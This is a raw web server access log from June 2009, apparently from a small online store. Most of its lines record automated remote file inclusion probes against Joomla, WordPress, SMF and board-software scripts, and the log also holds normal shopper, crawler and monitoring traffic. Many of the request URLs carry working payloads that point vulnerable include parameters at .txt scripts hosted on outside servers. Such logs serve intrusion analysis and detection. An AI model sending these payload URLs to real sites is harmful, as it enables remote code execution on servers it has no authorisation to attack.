64.34.181.87 - - [16/Jun/2009:03:01:46 -0400] "GET //[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
64.34.181.87 - - [16/Jun/2009:03:01:46 -0400] "GET //[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
64.34.181.87 - - [16/Jun/2009:03:01:46 -0400] "GET /logs//[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
64.34.181.87 - - [16/Jun/2009:03:01:46 -0400] "GET /logs//[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
195.34.78.110 - - [16/Jun/2009:03:01:47 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:47 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:47 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:49 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:56 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:56 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:56 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:58 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:02:08 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:02:10 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:02:10 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:02:10 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:02:26 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:02:27 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:02:27 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:02:27 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:02:27 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.249.71.14 - - [16/Jun/2009:03:02:54 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [16/Jun/2009:03:02:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0048644B1BD29100326E04S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.46.93.6 - - [16/Jun/2009:03:02:59 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
78.46.93.6 - - [16/Jun/2009:03:02:59 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
78.46.93.6 - - [16/Jun/2009:03:02:59 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.34.181.87 - - [16/Jun/2009:03:03:09 -0400] "GET /logs/error_log.Q108032700//[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
64.34.181.87 - - [16/Jun/2009:03:03:09 -0400] "GET /logs/error_log.Q108032700//[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
78.46.93.6 - - [16/Jun/2009:03:03:39 -0400] "GET //2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.46.93.6 - - [16/Jun/2009:03:03:39 -0400] "GET /logs/access_log.Q109051800//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.46.93.6 - - [16/Jun/2009:03:03:40 -0400] "GET /logs//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:03:04:37 -0400] "GET /logs/access_log.Q108032200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [16/Jun/2009:03:04:40 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:04:40 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:04:40 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:04:44 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:04:44 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:04:44 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
79.178.11.4 - - [16/Jun/2009:03:04:53 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:03:05:08 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
81.175.71.121 - - [16/Jun/2009:03:05:10 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.198.32.3 - - [16/Jun/2009:03:05:11 -0400] "GET /logs/access_log.Q109060800/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
81.175.71.121 - - [16/Jun/2009:03:05:19 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:03:05:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.178.11.4 - - [16/Jun/2009:03:05:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0096D3426992C600511F021+M37+ENG HTTP/1.1" 200 49494 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:03:05:29 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0096D3426992C600511F021+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:03:05:29 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0096D3426992C600511F021+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:03:05:29 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0096D3426992C600511F021+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
218.246.20.221 - - [16/Jun/2009:03:05:49 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jun/2009:03:05:49 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jun/2009:03:05:49 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jun/2009:03:05:49 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
130.13.170.93 - - [16/Jun/2009:03:06:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086D240612245003D7F09D+M37+ENG HTTP/1.1" 200 40496 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D24D61429500244F09D+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:03:06:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086D3426E529500A81F09E+M37+ENG HTTP/1.1" 200 40609 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D240612245003D7F09D+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
38.99.44.103 - - [16/Jun/2009:03:06:21 -0400] "GET /logs/access_log.Q107080800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.246.20.221 - - [16/Jun/2009:03:06:30 -0400] "GET /logs/access_log.Q109052600//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jun/2009:03:06:30 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:03:06:54 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://harvestusa.org///administrator//components/idi.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:03:06:54 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://harvestusa.org///administrator//components/idi.txt??%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:03:06:54 -0400] "GET /logs/error_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://harvestusa.org///administrator//components/idi.txt??%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
222.122.72.93 - - [16/Jun/2009:03:07:08 -0400] "GET /logs/access_log.Q109052200/ndex.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.122.72.93 - - [16/Jun/2009:03:07:08 -0400] "GET /logs/ndex.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.122.72.93 - - [16/Jun/2009:03:07:08 -0400] "GET /ndex.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:03:07:43 -0400] "GET /logs/error_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://harvestusa.org///administrator//components/idi.txt??%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:03:07:43 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://harvestusa.org///administrator//components/idi.txt??%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
78.46.93.6 - - [16/Jun/2009:03:08:08 -0400] "GET /logs/access_log.Q109052500%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:03:08:17 -0400] "GET /logs/access_log.Q107092400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.189.40.249 - - [16/Jun/2009:03:08:55 -0400] "GET /logs/access_log.Q109052400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://bimonet.zat.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:09:22 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:09:22 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:09:22 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.826"
211.189.40.249 - - [16/Jun/2009:03:09:22 -0400] "GET /logs/access_log.Q109052200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://bimonet.zat.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:09:26 -0400] "GET /include/mail.inc.php?skin_board_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:09:26 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:09:26 -0400] "GET /logs/access_log.Q109050700/include/mail.inc.php?skin_board_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:09:30 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:09:30 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:09:30 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
222.239.227.229 - - [16/Jun/2009:03:09:31 -0400] "GET /include/mail.inc.php?skin_board_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:09:31 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:09:31 -0400] "GET /logs/access_log.Q109050700/include/mail.inc.php?skin_board_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:03:09:40 -0400] "GET /logs/error_log.Q107090700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.122.72.93 - - [16/Jun/2009:03:09:41 -0400] "GET /logs/access_log.Q109051600%20%20/ndex.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:09:53 -0400] "GET /logs/error_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
78.46.93.6 - - [16/Jun/2009:03:09:56 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
78.46.93.6 - - [16/Jun/2009:03:09:58 -0400] "GET /logs/access_log.Q109051800%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:10:04 -0400] "GET /logs/error_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
209.59.12.99 - - [16/Jun/2009:03:10:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [16/Jun/2009:03:10:37 -0400] "GET /logs/access_log.Q109050700/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:10:37 -0400] "GET /include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:10:37 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.122.72.93 - - [16/Jun/2009:03:10:39 -0400] "GET /logs/access_log.Q109052900%20%20/ndex.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:10:44 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:10:44 -0400] "GET /logs/access_log.Q109050700/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:10:44 -0400] "GET /include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
78.46.93.6 - - [16/Jun/2009:03:10:55 -0400] "GET /logs/access_log.Q109060400%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
130.13.170.93 - - [16/Jun/2009:03:11:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086D3446AB28500AAFF09E+M37+ENG HTTP/1.1" 200 76258 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D3426E529500A81F09E+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:03:11:10 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D3446AB28500AAFF09E+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:03:11:10 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D3446AB28500AAFF09E+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:03:11:10 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D3446AB28500AAFF09E+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
38.99.13.118 - - [16/Jun/2009:03:11:30 -0400] "GET /logs/access_log.Q108012500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [16/Jun/2009:03:12:05 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.249.36.194 - - [16/Jun/2009:03:12:05 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
218.249.36.194 - - [16/Jun/2009:03:12:05 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
38.99.44.103 - - [16/Jun/2009:03:12:17 -0400] "GET /logs/error_log.Q108030200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [16/Jun/2009:03:12:32 -0400] "GET /logs/access_log.Q109050700%20%20/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:12:38 -0400] "GET //?include_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:12:38 -0400] "GET /logs//?include_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 5711 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:12:38 -0400] "GET /logs/access_log.Q109050700%20%20/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.203.180.144 - - [16/Jun/2009:03:12:45 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:03:12:45 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:03:12:45 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:03:12:48 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:03:12:48 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:03:12:48 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.249.36.194 - - [16/Jun/2009:03:12:51 -0400] "GET /logs/access_log.Q109051700%20%20/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.203.180.144 - - [16/Jun/2009:03:12:56 -0400] "GET /logs/error_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
